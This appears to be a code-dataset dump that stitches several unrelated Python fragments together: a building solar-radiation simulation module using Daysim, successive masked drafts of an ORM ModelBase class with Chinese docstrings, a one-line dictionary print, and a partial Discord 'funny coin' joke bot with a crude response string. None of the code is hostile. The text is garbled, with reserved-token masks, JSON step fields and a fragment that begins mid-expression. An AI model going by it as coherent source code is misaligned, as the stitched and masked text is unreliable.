np.array(items_sensor_name_and_result[surface])) for surface in\n select_sensors.index]).sum(axis=0)\n dict_not_aggregated[field] = array_field / 1000\n dict_not_aggregated[field_area] = area_m2\n data_aggregated_kW = pd.DataFrame(dict_not_aggregated).round(2)\n data_aggregated_kW['Date'] = weatherfile['date']\n data_aggregated_kW.set_index('Date', inplace=True)\n data_aggregated_kW.to_csv(locator.get_radiation_building(building_name))\n",
"step-5": "import json\nimport os\n\nimport numpy as np\nimport pandas as pd\nimport py4design.py2radiance as py2radiance\nimport py4design.py3dmodel.calculate as calculate\nfrom py4design import py3dmodel\n\n__author__ = \"Jimeno A. Fonseca\"\n__copyright__ = \"Copyright 2017, Architecture and Building Systems - ETH Zurich\"\n__credits__ = [\"Jimeno A. Fonseca\", \"Kian Wee Chen\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = \"Daren Thomas\"\n__email__ = \"[email protected]\"\n__status__ = \"Production\"\n\nfrom cea.constants import HOURS_IN_YEAR\nfrom cea.resources.radiation_daysim.geometry_generator import BuildingGeometry\nfrom cea import suppress_3rd_party_debug_loggers\n\nsuppress_3rd_party_debug_loggers()\n\n\ndef create_sensor_input_file(rad, chunk_n):\n sensor_file_path = os.path.join(rad.data_folder_path, \"points_\" + str(chunk_n) + \".pts\")\n sensor_file = open(sensor_file_path, \"w\")\n sensor_pts_data = py2radiance.write_rad.sensor_file(rad.sensor_positions, rad.sensor_normals)\n sensor_file.write(sensor_pts_data)\n sensor_file.close()\n rad.sensor_file_path = sensor_file_path\n\n\ndef generate_sensor_surfaces(occface, wall_dim, roof_dim, srf_type, orientation, normal, intersection):\n mid_pt = py3dmodel.calculate.face_midpt(occface)\n location_pt = py3dmodel.modify.move_pt(mid_pt, normal, 0.01)\n moved_oface = py3dmodel.fetch.topo2topotype(py3dmodel.modify.move(mid_pt, location_pt, occface))\n if srf_type == 'roofs':\n xdim = ydim = roof_dim\n else:\n xdim = ydim = wall_dim\n # put it into occ and subdivide surfaces\n sensor_surfaces = py3dmodel.construct.grid_face(moved_oface, xdim, ydim)\n\n # calculate list of properties per surface\n sensor_intersection = [intersection for x in sensor_surfaces]\n sensor_dir = [normal for x in sensor_surfaces]\n sensor_cord = [py3dmodel.calculate.face_midpt(x) for x in sensor_surfaces]\n sensor_type = [srf_type for x in sensor_surfaces]\n sensor_orientation = [orientation for x in sensor_surfaces]\n sensor_area = [calculate.face_area(x) * (1.0 - scalar) for x, scalar in zip(sensor_surfaces, sensor_intersection)]\n\n return sensor_dir, sensor_cord, sensor_type, sensor_area, sensor_orientation, sensor_intersection\n\n\ndef calc_sensors_building(building_geometry, grid_size):\n sensor_dir_list = []\n sensor_cord_list = []\n sensor_type_list = []\n sensor_area_list = []\n sensor_orientation_list = []\n sensor_intersection_list = []\n surfaces_types = ['walls', 'windows', 'roofs']\n sensor_vertical_grid_dim = grid_size[\"walls_grid\"]\n sensor_horizontal_grid_dim = grid_size[\"roof_grid\"]\n for srf_type in surfaces_types:\n occface_list = getattr(building_geometry, srf_type)\n if srf_type == 'roofs':\n orientation_list = ['top'] * len(occface_list)\n normals_list = [(0.0, 0.0, 1.0)] * len(occface_list)\n interesection_list = [0] * len(occface_list)\n elif srf_type == 'windows':\n orientation_list = getattr(building_geometry, \"orientation_{srf_type}\".format(srf_type=srf_type))\n normals_list = getattr(building_geometry, \"normals_{srf_type}\".format(srf_type=srf_type))\n interesection_list = [0] * len(occface_list)\n else:\n orientation_list = getattr(building_geometry, \"orientation_{srf_type}\".format(srf_type=srf_type))\n normals_list = getattr(building_geometry, \"normals_{srf_type}\".format(srf_type=srf_type))\n interesection_list = getattr(building_geometry, \"intersect_{srf_type}\".format(srf_type=srf_type))\n for orientation, normal, face, intersection in zip(orientation_list, normals_list, occface_list,\n interesection_list):\n sensor_dir, \\\n sensor_cord, \\\n sensor_type, \\\n sensor_area, \\\n sensor_orientation, \\\n sensor_intersection = generate_sensor_surfaces(face,\n sensor_vertical_grid_dim,\n sensor_horizontal_grid_dim,\n srf_type,\n orientation,\n normal,\n intersection)\n sensor_intersection_list.extend(sensor_intersection)\n sensor_dir_list.extend(sensor_dir)\n sensor_cord_list.extend(sensor_cord)\n sensor_type_list.extend(sensor_type)\n sensor_area_list.extend(sensor_area)\n sensor_orientation_list.extend(sensor_orientation)\n\n return sensor_dir_list, sensor_cord_list, sensor_type_list, sensor_area_list, sensor_orientation_list, sensor_intersection_list\n\n\ndef calc_sensors_zone(building_names, locator, grid_size, geometry_pickle_dir):\n sensors_coords_zone = []\n sensors_dir_zone = []\n sensors_total_number_list = []\n names_zone = []\n sensors_code_zone = []\n sensor_intersection_zone = []\n for building_name in building_names:\n building_geometry = BuildingGeometry.load(os.path.join(geometry_pickle_dir, 'zone', building_name))\n # get sensors in the building\n sensors_dir_building, \\\n sensors_coords_building, \\\n sensors_type_building, \\\n sensors_area_building, \\\n sensor_orientation_building, \\\n sensor_intersection_building = calc_sensors_building(building_geometry, grid_size)\n\n # get the total number of sensors and store in lst\n sensors_number = len(sensors_coords_building)\n sensors_total_number_list.append(sensors_number)\n\n sensors_code = ['srf' + str(x) for x in range(sensors_number)]\n sensors_code_zone.append(sensors_code)\n\n # get the total list of coordinates and directions to send to daysim\n sensors_coords_zone.extend(sensors_coords_building)\n sensors_dir_zone.extend(sensors_dir_building)\n\n # get total list of intersections\n sensor_intersection_zone.append(sensor_intersection_building)\n\n # get the name of all buildings\n names_zone.append(building_name)\n\n # save sensors geometry result to disk\n pd.DataFrame({'BUILDING': building_name,\n 'SURFACE': sensors_code,\n 'orientation': sensor_orientation_building,\n 'intersection': sensor_intersection_building,\n 'Xcoor': [x[0] for x in sensors_coords_building],\n 'Ycoor': [x[1] for x in sensors_coords_building],\n 'Zcoor': [x[2] for x in sensors_coords_building],\n 'Xdir': [x[0] for x in sensors_dir_building],\n 'Ydir': [x[1] for x in sensors_dir_building],\n 'Zdir': [x[2] for x in sensors_dir_building],\n 'AREA_m2': sensors_area_building,\n 'TYPE': sensors_type_building}).to_csv(locator.get_radiation_metadata(building_name), index=None)\n\n return sensors_coords_zone, sensors_dir_zone, sensors_total_number_list, names_zone, sensors_code_zone, sensor_intersection_zone\n\n\ndef isolation_daysim(chunk_n, cea_daysim, building_names, locator, radiance_parameters, write_sensor_data, grid_size,\n max_global, weatherfile, geometry_pickle_dir):\n # initialize daysim project\n daysim_project = cea_daysim.initialize_daysim_project('chunk_{n}'.format(n=chunk_n))\n print('Creating daysim project in: {daysim_dir}'.format(daysim_dir=daysim_project.project_path))\n\n # calculate sensors\n print(\"Calculating and sending sensor points\")\n sensors_coords_zone, \\\n sensors_dir_zone, \\\n sensors_number_zone, \\\n names_zone, \\\n sensors_code_zone, \\\n sensor_intersection_zone = calc_sensors_zone(building_names, locator, grid_size, geometry_pickle_dir)\n\n num_sensors = sum(sensors_number_zone)\n daysim_project.create_sensor_input_file(sensors_coords_zone, sensors_dir_zone, num_sensors, \"w/m2\")\n\n print(\"Starting Daysim simulation for buildings: {buildings}\".format(buildings=names_zone))\n print(\"Total number of sensors: {num_sensors}\".format(num_sensors=num_sensors))\n\n print('Writing radiance parameters')\n daysim_project.write_radiance_parameters(radiance_parameters[\"rad_ab\"], radiance_parameters[\"rad_ad\"],\n radiance_parameters[\"rad_as\"], radiance_parameters[\"rad_ar\"],\n radiance_parameters[\"rad_aa\"], radiance_parameters[\"rad_lr\"],\n radiance_parameters[\"rad_st\"], radiance_parameters[\"rad_sj\"],\n radiance_parameters[\"rad_lw\"], radiance_parameters[\"rad_dj\"],\n radiance_parameters[\"rad_ds\"], radiance_parameters[\"rad_dr\"],\n radiance_parameters[\"rad_dp\"])\n\n print('Executing hourly solar isolation calculation')\n daysim_project.execute_gen_dc()\n daysim_project.execute_ds_illum()\n\n print('Reading results...')\n solar_res = daysim_project.eval_ill()\n\n # check inconsistencies and replace by max value of weather file\n print('Fixing inconsistencies, if any')\n solar_res = np.clip(solar_res, a_min=0.0, a_max=max_global)\n\n # Check if leap year and remove extra day\n if solar_res.shape[1] == HOURS_IN_YEAR + 24:\n print('Removing leap day')\n leap_day_hours = range(1416, 1440)\n solar_res = np.delete(solar_res, leap_day_hours, axis=1)\n\n print(\"Writing results to disk\")\n index = 0\n for building_name, \\\n sensors_number_building, \\\n sensor_code_building, \\\n sensor_intersection_building in zip(names_zone,\n sensors_number_zone,\n sensors_code_zone,\n sensor_intersection_zone):\n # select sensors data\n selection_of_results = solar_res[index:index + sensors_number_building]\n selection_of_results[np.array(sensor_intersection_building) == 1] = 0\n items_sensor_name_and_result = dict(zip(sensor_code_building, selection_of_results.tolist()))\n index = index + sensors_number_building\n\n # create summary and save to disk\n write_aggregated_results(building_name, items_sensor_name_and_result, locator, weatherfile)\n\n if write_sensor_data:\n write_sensor_results(building_name, items_sensor_name_and_result, locator)\n\n # erase daysim folder to avoid conflicts after every iteration\n print('Removing results folder')\n daysim_project.cleanup_project()\n\n\ndef write_sensor_results(building_name, items_sensor_name_and_result, locator):\n with open(locator.get_radiation_building_sensors(building_name), 'w') as outfile:\n json.dump(items_sensor_name_and_result, outfile)\n\n\ndef write_aggregated_results(building_name, items_sensor_name_and_result, locator, weatherfile):\n geometry = pd.read_csv(locator.get_radiation_metadata(building_name))\n geometry['code'] = geometry['TYPE'] + '_' + geometry['orientation'] + '_kW'\n solar_analysis_fields = ['windows_east_kW',\n 'windows_west_kW',\n 'windows_south_kW',\n 'windows_north_kW',\n 'walls_east_kW',\n 'walls_west_kW',\n 'walls_south_kW',\n 'walls_north_kW',\n 'roofs_top_kW']\n solar_analysis_fields_area = ['windows_east_m2',\n 'windows_west_m2',\n 'windows_south_m2',\n 'windows_north_m2',\n 'walls_east_m2',\n 'walls_west_m2',\n 'walls_south_m2',\n 'walls_north_m2',\n 'roofs_top_m2']\n dict_not_aggregated = {}\n\n for field, field_area in zip(solar_analysis_fields, solar_analysis_fields_area):\n select_sensors = geometry.loc[geometry['code'] == field].set_index('SURFACE')\n area_m2 = select_sensors['AREA_m2'].sum()\n array_field = np.array([select_sensors.loc[surface, 'AREA_m2'] *\n np.array(items_sensor_name_and_result[surface])\n for surface in select_sensors.index]).sum(axis=0)\n dict_not_aggregated[field] = array_field / 1000 # in kWh\n dict_not_aggregated[field_area] = area_m2\n\n data_aggregated_kW = (pd.DataFrame(dict_not_aggregated)).round(2)\n data_aggregated_kW[\"Date\"] = weatherfile[\"date\"]\n data_aggregated_kW.set_index('Date', inplace=True)\n data_aggregated_kW.to_csv(locator.get_radiation_building(building_name))\n",
"step-ids": [
6,
7,
9,
10,
11
]
}
|
[
6,
7,
9,
10,
11
] |
<|reserved_special_token_0|>
class ModelBase:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, schema):
self.schema = schema
<|reserved_special_token_0|>
@property
def uid(self):
return self.schema.uid
def refresh(self):
self.schema = self._get_cls_schema().query.get(self.schema.id)
<|reserved_special_token_0|>
@classmethod
def get_by_id(cls, id):
schema = cls._get_cls_schema().query.get(id)
if schema is None:
raise ResponseError(info='对应编号信息不存在')
return cls(schema)
@classmethod
def get_by_uid(cls, uid):
schema = cls._get_cls_schema().query.filter_by(uid=uid).first()
return cls(schema)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ModelBase:
<|reserved_special_token_0|>
@classmethod
@abstractmethod
def _get_cls_schema(cls):
pass
def __new__(cls, schema):
if schema is None:
return None
else:
return object.__new__(cls)
def __init__(self, schema):
self.schema = schema
<|reserved_special_token_0|>
@property
def uid(self):
return self.schema.uid
def refresh(self):
self.schema = self._get_cls_schema().query.get(self.schema.id)
<|reserved_special_token_0|>
@classmethod
def get_by_id(cls, id):
schema = cls._get_cls_schema().query.get(id)
if schema is None:
raise ResponseError(info='对应编号信息不存在')
return cls(schema)
@classmethod
def get_by_uid(cls, uid):
schema = cls._get_cls_schema().query.filter_by(uid=uid).first()
return cls(schema)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ModelBase:
<|reserved_special_token_0|>
@classmethod
@abstractmethod
def _get_cls_schema(cls):
pass
def __new__(cls, schema):
if schema is None:
return None
else:
return object.__new__(cls)
def __init__(self, schema):
self.schema = schema
<|reserved_special_token_0|>
@property
def uid(self):
return self.schema.uid
def refresh(self):
self.schema = self._get_cls_schema().query.get(self.schema.id)
def to_dict(self, include_keys=None, exclude_keys=None, depth=0, lite=False
):
""" 把用 property 装饰的属性封装到一个 dict 中再返回
:param include_keys, list, 指定需要返回的属性, 默认为全部, 但不包含下划线开始的属性
:param exclude_keys, list, 指定需要排除的属性, 默认为 []
:param depth, int, 深度, object 可能含有对其它 object 的引用, object.to_dict() 调用限定两层
:param lite, boolean, 是否为精简版, 在精简版中还会考虑 object 的 lite_exclude_keys
"""
return_dict = {}
attrs = self.__class__.__dict__
include_keys = include_keys or [name for name in attrs.keys() if
not name.startswith('_')]
exclude_keys = exclude_keys or []
if lite is True:
lite_exclude_keys = getattr(self, 'lite_exclude_keys', [])
exclude_keys = exclude_keys + lite_exclude_keys
include_keys = [name for name in include_keys if name not in
exclude_keys]
if depth > 1:
return self.uid
for key, value in attrs.items():
if key not in include_keys:
continue
if not isinstance(value, property):
continue
value = getattr(self, key)
if isinstance(value, Enum):
return_dict[key] = value.value
elif isinstance(value, list):
list_values = []
for item in value:
if hasattr(item, 'to_dict'):
list_values.append(item.to_dict(depth=depth + 1,
lite=True))
else:
list_values.append(item)
return_dict[key] = list_values
elif isinstance(value, dict):
dict_values = {}
for k, v in value.items():
if hasattr(v, 'to_dict'):
dict_values[k] = v.to_dict(depth=depth + 1, lite=True)
else:
dict_values[k] = v
return_dict[key] = dict_values
elif isinstance(value, datetime):
return_dict[key] = value.isoformat()
elif hasattr(value, 'to_dict'):
return_dict[key] = value.to_dict(depth=depth + 1, lite=True)
else:
return_dict[key] = value
return return_dict
@classmethod
def get_by_id(cls, id):
schema = cls._get_cls_schema().query.get(id)
if schema is None:
raise ResponseError(info='对应编号信息不存在')
return cls(schema)
@classmethod
def get_by_uid(cls, uid):
schema = cls._get_cls_schema().query.filter_by(uid=uid).first()
return cls(schema)
<|reserved_special_token_1|>
from abc import ABCMeta, abstractmethod
from datetime import datetime
from enum import Enum
from application.response import ResponseError
class ModelBase:
__metaclass__ = ABCMeta
@classmethod
@abstractmethod
def _get_cls_schema(cls):
pass
def __new__(cls, schema):
if schema is None:
return None
else:
return object.__new__(cls)
def __init__(self, schema):
self.schema = schema
@property
def id(self):
return self.schema.id
@property
def uid(self):
return self.schema.uid
def refresh(self):
self.schema = self._get_cls_schema().query.get(self.schema.id)
def to_dict(self, include_keys=None, exclude_keys=None, depth=0, lite=False
):
""" 把用 property 装饰的属性封装到一个 dict 中再返回
:param include_keys, list, 指定需要返回的属性, 默认为全部, 但不包含下划线开始的属性
:param exclude_keys, list, 指定需要排除的属性, 默认为 []
:param depth, int, 深度, object 可能含有对其它 object 的引用, object.to_dict() 调用限定两层
:param lite, boolean, 是否为精简版, 在精简版中还会考虑 object 的 lite_exclude_keys
"""
return_dict = {}
attrs = self.__class__.__dict__
include_keys = include_keys or [name for name in attrs.keys() if
not name.startswith('_')]
exclude_keys = exclude_keys or []
if lite is True:
lite_exclude_keys = getattr(self, 'lite_exclude_keys', [])
exclude_keys = exclude_keys + lite_exclude_keys
include_keys = [name for name in include_keys if name not in
exclude_keys]
if depth > 1:
return self.uid
for key, value in attrs.items():
if key not in include_keys:
continue
if not isinstance(value, property):
continue
value = getattr(self, key)
if isinstance(value, Enum):
return_dict[key] = value.value
elif isinstance(value, list):
list_values = []
for item in value:
if hasattr(item, 'to_dict'):
list_values.append(item.to_dict(depth=depth + 1,
lite=True))
else:
list_values.append(item)
return_dict[key] = list_values
elif isinstance(value, dict):
dict_values = {}
for k, v in value.items():
if hasattr(v, 'to_dict'):
dict_values[k] = v.to_dict(depth=depth + 1, lite=True)
else:
dict_values[k] = v
return_dict[key] = dict_values
elif isinstance(value, datetime):
return_dict[key] = value.isoformat()
elif hasattr(value, 'to_dict'):
return_dict[key] = value.to_dict(depth=depth + 1, lite=True)
else:
return_dict[key] = value
return return_dict
@classmethod
def get_by_id(cls, id):
schema = cls._get_cls_schema().query.get(id)
if schema is None:
raise ResponseError(info='对应编号信息不存在')
return cls(schema)
@classmethod
def get_by_uid(cls, uid):
schema = cls._get_cls_schema().query.filter_by(uid=uid).first()
return cls(schema)
<|reserved_special_token_1|>
from abc import ABCMeta, abstractmethod
from datetime import datetime
from enum import Enum
from application.response import ResponseError
class ModelBase:
__metaclass__ = ABCMeta
@classmethod
@abstractmethod
def _get_cls_schema(cls):
pass
def __new__(cls, schema):
if schema is None:
return None
else:
return object.__new__(cls)
def __init__(self, schema):
self.schema = schema
@property
def id(self):
return self.schema.id
@property
def uid(self):
return self.schema.uid
def refresh(self):
self.schema = self._get_cls_schema().query.get(self.schema.id)
def to_dict(self, include_keys=None, exclude_keys=None, depth=0, lite=False):
""" 把用 property 装饰的属性封装到一个 dict 中再返回
:param include_keys, list, 指定需要返回的属性, 默认为全部, 但不包含下划线开始的属性
:param exclude_keys, list, 指定需要排除的属性, 默认为 []
:param depth, int, 深度, object 可能含有对其它 object 的引用, object.to_dict() 调用限定两层
:param lite, boolean, 是否为精简版, 在精简版中还会考虑 object 的 lite_exclude_keys
"""
return_dict = {}
attrs = self.__class__.__dict__
include_keys = include_keys or [
name for name in attrs.keys() if not name.startswith("_")
]
exclude_keys = exclude_keys or []
if lite is True:
lite_exclude_keys = getattr(self, "lite_exclude_keys", [])
exclude_keys = exclude_keys + lite_exclude_keys
include_keys = [name for name in include_keys if name not in exclude_keys]
if depth > 1:
return self.uid
for key, value in attrs.items():
if key not in include_keys:
continue
if not isinstance(value, property):
continue
value = getattr(self, key)
if isinstance(value, Enum):
return_dict[key] = value.value
elif isinstance(value, list):
list_values = []
for item in value:
if hasattr(item, "to_dict"):
list_values.append(item.to_dict(depth=depth + 1, lite=True))
else:
list_values.append(item)
return_dict[key] = list_values
elif isinstance(value, dict):
dict_values = {}
for k, v in value.items():
if hasattr(v, "to_dict"):
dict_values[k] = v.to_dict(depth=depth + 1, lite=True)
else:
dict_values[k] = v
return_dict[key] = dict_values
elif isinstance(value, datetime):
return_dict[key] = value.isoformat()
elif hasattr(value, "to_dict"):
return_dict[key] = value.to_dict(depth=depth + 1, lite=True)
else:
return_dict[key] = value
return return_dict
@classmethod
def get_by_id(cls, id):
schema = cls._get_cls_schema().query.get(id)
if schema is None:
raise ResponseError(info='对应编号信息不存在')
return cls(schema)
@classmethod
def get_by_uid(cls, uid):
schema = cls._get_cls_schema().query.filter_by(uid=uid).first()
return cls(schema)
|
flexible
|
{
"blob_id": "5917c891d2885f779dc33f189f1a875efbd0c302",
"index": 163,
"step-1": "<mask token>\n\n\nclass ModelBase:\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, schema):\n self.schema = schema\n <mask token>\n\n @property\n def uid(self):\n return self.schema.uid\n\n def refresh(self):\n self.schema = self._get_cls_schema().query.get(self.schema.id)\n <mask token>\n\n @classmethod\n def get_by_id(cls, id):\n schema = cls._get_cls_schema().query.get(id)\n if schema is None:\n raise ResponseError(info='对应编号信息不存在')\n return cls(schema)\n\n @classmethod\n def get_by_uid(cls, uid):\n schema = cls._get_cls_schema().query.filter_by(uid=uid).first()\n return cls(schema)\n",
"step-2": "<mask token>\n\n\nclass ModelBase:\n <mask token>\n\n @classmethod\n @abstractmethod\n def _get_cls_schema(cls):\n pass\n\n def __new__(cls, schema):\n if schema is None:\n return None\n else:\n return object.__new__(cls)\n\n def __init__(self, schema):\n self.schema = schema\n <mask token>\n\n @property\n def uid(self):\n return self.schema.uid\n\n def refresh(self):\n self.schema = self._get_cls_schema().query.get(self.schema.id)\n <mask token>\n\n @classmethod\n def get_by_id(cls, id):\n schema = cls._get_cls_schema().query.get(id)\n if schema is None:\n raise ResponseError(info='对应编号信息不存在')\n return cls(schema)\n\n @classmethod\n def get_by_uid(cls, uid):\n schema = cls._get_cls_schema().query.filter_by(uid=uid).first()\n return cls(schema)\n",
"step-3": "<mask token>\n\n\nclass ModelBase:\n <mask token>\n\n @classmethod\n @abstractmethod\n def _get_cls_schema(cls):\n pass\n\n def __new__(cls, schema):\n if schema is None:\n return None\n else:\n return object.__new__(cls)\n\n def __init__(self, schema):\n self.schema = schema\n <mask token>\n\n @property\n def uid(self):\n return self.schema.uid\n\n def refresh(self):\n self.schema = self._get_cls_schema().query.get(self.schema.id)\n\n def to_dict(self, include_keys=None, exclude_keys=None, depth=0, lite=False\n ):\n \"\"\" 把用 property 装饰的属性封装到一个 dict 中再返回\n :param include_keys, list, 指定需要返回的属性, 默认为全部, 但不包含下划线开始的属性\n :param exclude_keys, list, 指定需要排除的属性, 默认为 []\n :param depth, int, 深度, object 可能含有对其它 object 的引用, object.to_dict() 调用限定两层\n :param lite, boolean, 是否为精简版, 在精简版中还会考虑 object 的 lite_exclude_keys\n \"\"\"\n return_dict = {}\n attrs = self.__class__.__dict__\n include_keys = include_keys or [name for name in attrs.keys() if \n not name.startswith('_')]\n exclude_keys = exclude_keys or []\n if lite is True:\n lite_exclude_keys = getattr(self, 'lite_exclude_keys', [])\n exclude_keys = exclude_keys + lite_exclude_keys\n include_keys = [name for name in include_keys if name not in\n exclude_keys]\n if depth > 1:\n return self.uid\n for key, value in attrs.items():\n if key not in include_keys:\n continue\n if not isinstance(value, property):\n continue\n value = getattr(self, key)\n if isinstance(value, Enum):\n return_dict[key] = value.value\n elif isinstance(value, list):\n list_values = []\n for item in value:\n if hasattr(item, 'to_dict'):\n list_values.append(item.to_dict(depth=depth + 1,\n lite=True))\n else:\n list_values.append(item)\n return_dict[key] = list_values\n elif isinstance(value, dict):\n dict_values = {}\n for k, v in value.items():\n if hasattr(v, 'to_dict'):\n dict_values[k] = v.to_dict(depth=depth + 1, lite=True)\n else:\n dict_values[k] = v\n return_dict[key] = dict_values\n elif isinstance(value, datetime):\n return_dict[key] = value.isoformat()\n elif hasattr(value, 'to_dict'):\n return_dict[key] = value.to_dict(depth=depth + 1, lite=True)\n else:\n return_dict[key] = value\n return return_dict\n\n @classmethod\n def get_by_id(cls, id):\n schema = cls._get_cls_schema().query.get(id)\n if schema is None:\n raise ResponseError(info='对应编号信息不存在')\n return cls(schema)\n\n @classmethod\n def get_by_uid(cls, uid):\n schema = cls._get_cls_schema().query.filter_by(uid=uid).first()\n return cls(schema)\n",
"step-4": "from abc import ABCMeta, abstractmethod\nfrom datetime import datetime\nfrom enum import Enum\nfrom application.response import ResponseError\n\n\nclass ModelBase:\n __metaclass__ = ABCMeta\n\n @classmethod\n @abstractmethod\n def _get_cls_schema(cls):\n pass\n\n def __new__(cls, schema):\n if schema is None:\n return None\n else:\n return object.__new__(cls)\n\n def __init__(self, schema):\n self.schema = schema\n\n @property\n def id(self):\n return self.schema.id\n\n @property\n def uid(self):\n return self.schema.uid\n\n def refresh(self):\n self.schema = self._get_cls_schema().query.get(self.schema.id)\n\n def to_dict(self, include_keys=None, exclude_keys=None, depth=0, lite=False\n ):\n \"\"\" 把用 property 装饰的属性封装到一个 dict 中再返回\n :param include_keys, list, 指定需要返回的属性, 默认为全部, 但不包含下划线开始的属性\n :param exclude_keys, list, 指定需要排除的属性, 默认为 []\n :param depth, int, 深度, object 可能含有对其它 object 的引用, object.to_dict() 调用限定两层\n :param lite, boolean, 是否为精简版, 在精简版中还会考虑 object 的 lite_exclude_keys\n \"\"\"\n return_dict = {}\n attrs = self.__class__.__dict__\n include_keys = include_keys or [name for name in attrs.keys() if \n not name.startswith('_')]\n exclude_keys = exclude_keys or []\n if lite is True:\n lite_exclude_keys = getattr(self, 'lite_exclude_keys', [])\n exclude_keys = exclude_keys + lite_exclude_keys\n include_keys = [name for name in include_keys if name not in\n exclude_keys]\n if depth > 1:\n return self.uid\n for key, value in attrs.items():\n if key not in include_keys:\n continue\n if not isinstance(value, property):\n continue\n value = getattr(self, key)\n if isinstance(value, Enum):\n return_dict[key] = value.value\n elif isinstance(value, list):\n list_values = []\n for item in value:\n if hasattr(item, 'to_dict'):\n list_values.append(item.to_dict(depth=depth + 1,\n lite=True))\n else:\n list_values.append(item)\n return_dict[key] = list_values\n elif isinstance(value, dict):\n dict_values = {}\n for k, v in value.items():\n if hasattr(v, 'to_dict'):\n dict_values[k] = v.to_dict(depth=depth + 1, lite=True)\n else:\n dict_values[k] = v\n return_dict[key] = dict_values\n elif isinstance(value, datetime):\n return_dict[key] = value.isoformat()\n elif hasattr(value, 'to_dict'):\n return_dict[key] = value.to_dict(depth=depth + 1, lite=True)\n else:\n return_dict[key] = value\n return return_dict\n\n @classmethod\n def get_by_id(cls, id):\n schema = cls._get_cls_schema().query.get(id)\n if schema is None:\n raise ResponseError(info='对应编号信息不存在')\n return cls(schema)\n\n @classmethod\n def get_by_uid(cls, uid):\n schema = cls._get_cls_schema().query.filter_by(uid=uid).first()\n return cls(schema)\n",
"step-5": "from abc import ABCMeta, abstractmethod\nfrom datetime import datetime\nfrom enum import Enum\n\nfrom application.response import ResponseError\n\n\nclass ModelBase:\n __metaclass__ = ABCMeta\n\n @classmethod\n @abstractmethod\n def _get_cls_schema(cls):\n pass\n\n def __new__(cls, schema):\n if schema is None:\n return None\n else:\n return object.__new__(cls)\n\n def __init__(self, schema):\n self.schema = schema\n\n @property\n def id(self):\n return self.schema.id\n\n @property\n def uid(self):\n return self.schema.uid\n\n def refresh(self):\n self.schema = self._get_cls_schema().query.get(self.schema.id)\n\n def to_dict(self, include_keys=None, exclude_keys=None, depth=0, lite=False):\n \"\"\" 把用 property 装饰的属性封装到一个 dict 中再返回\n :param include_keys, list, 指定需要返回的属性, 默认为全部, 但不包含下划线开始的属性\n :param exclude_keys, list, 指定需要排除的属性, 默认为 []\n :param depth, int, 深度, object 可能含有对其它 object 的引用, object.to_dict() 调用限定两层\n :param lite, boolean, 是否为精简版, 在精简版中还会考虑 object 的 lite_exclude_keys\n \"\"\"\n return_dict = {}\n\n attrs = self.__class__.__dict__\n\n include_keys = include_keys or [\n name for name in attrs.keys() if not name.startswith(\"_\")\n ]\n exclude_keys = exclude_keys or []\n\n if lite is True:\n lite_exclude_keys = getattr(self, \"lite_exclude_keys\", [])\n exclude_keys = exclude_keys + lite_exclude_keys\n\n include_keys = [name for name in include_keys if name not in exclude_keys]\n\n if depth > 1:\n return self.uid\n\n for key, value in attrs.items():\n if key not in include_keys:\n continue\n if not isinstance(value, property):\n continue\n value = getattr(self, key)\n if isinstance(value, Enum):\n return_dict[key] = value.value\n\n elif isinstance(value, list):\n list_values = []\n for item in value:\n if hasattr(item, \"to_dict\"):\n list_values.append(item.to_dict(depth=depth + 1, lite=True))\n else:\n list_values.append(item)\n return_dict[key] = list_values\n\n elif isinstance(value, dict):\n dict_values = {}\n for k, v in value.items():\n if hasattr(v, \"to_dict\"):\n dict_values[k] = v.to_dict(depth=depth + 1, lite=True)\n else:\n dict_values[k] = v\n return_dict[key] = dict_values\n\n elif isinstance(value, datetime):\n return_dict[key] = value.isoformat()\n\n elif hasattr(value, \"to_dict\"):\n return_dict[key] = value.to_dict(depth=depth + 1, lite=True)\n\n else:\n return_dict[key] = value\n return return_dict\n\n @classmethod\n def get_by_id(cls, id):\n schema = cls._get_cls_schema().query.get(id)\n if schema is None:\n raise ResponseError(info='对应编号信息不存在')\n return cls(schema)\n\n @classmethod\n def get_by_uid(cls, uid):\n schema = cls._get_cls_schema().query.filter_by(uid=uid).first()\n return cls(schema)\n",
"step-ids": [
6,
8,
9,
12,
13
]
}
|
[
6,
8,
9,
12,
13
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(dic['name'])
<|reserved_special_token_1|>
dic = {'name': 'Eric', 'age': '25'}
print(dic['name'])
<|reserved_special_token_1|>
dic = {'name': 'Eric', 'age': '25'} # 딕셔너리 형태
print(dic['name'])
|
flexible
|
{
"blob_id": "09c3a10230e7d0b3b893ccf236c39fc2dc12b2c6",
"index": 1097,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(dic['name'])\n",
"step-3": "dic = {'name': 'Eric', 'age': '25'}\nprint(dic['name'])\n",
"step-4": "dic = {'name': 'Eric', 'age': '25'} # 딕셔너리 형태\n\n\nprint(dic['name'])\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import discord
from discord.ext import commands
from discord.ext.commands import Bot
import asyncio
import random
import requests
import os
#Discord Tech Stuff
BOT_PREFIX = ("!")
client = discord.Client()
client = Bot(command_prefix=BOT_PREFIX)
#Functions of the Funny Coin
@client.command()
async def wasitfunny():
possible_responses = [
"Per the judgement from the committee of comedy, we have decided that the joke was indeed funny",
"Per the judgement from the committee of comedy, we have decided that the joke was not fucking funny you cretin",
]
await client.say(random.choice(possible_responses))
@client.command()
async def isitfunny(funny_subject):
responses = [
"Nah that wasn't really funny",
"There is no funny present",
"YOU FORGOT THE FUNNY",
"There is no comedy present here",
"hahaaaaa",
"Funnt",
"Hey man that's pretty funny thanks for sharing",
"jajajajajajajajajaja",
]
await client.say("regarding " + str(funny_subject) + ", " + random.choice(responses))
@client.command()
async def isitironic(irony_subjects):
irony_responses = [
"one irony point",
"that's pretty ironic man",
"ironic",
"no irony present",
"minus irony point",
"where is the irony? I was told there would be irony?",
]
await client.say(random.choice(irony_responses))
#Alex, Me, Chris, Anthony Coins, Want to add system that has coins for everyone and you can make a like profile for coins
afc = 0
mfc = 0
cfc = 0
anfc = 0
@client.command()
async def alexfc(anum):
global afc
afc += int(anum)
await client.say("Alex has " + str(afc) + " funny coins")
@client.command()
async def muhfc(mnum):
global mfc
mfc += int(mnum)
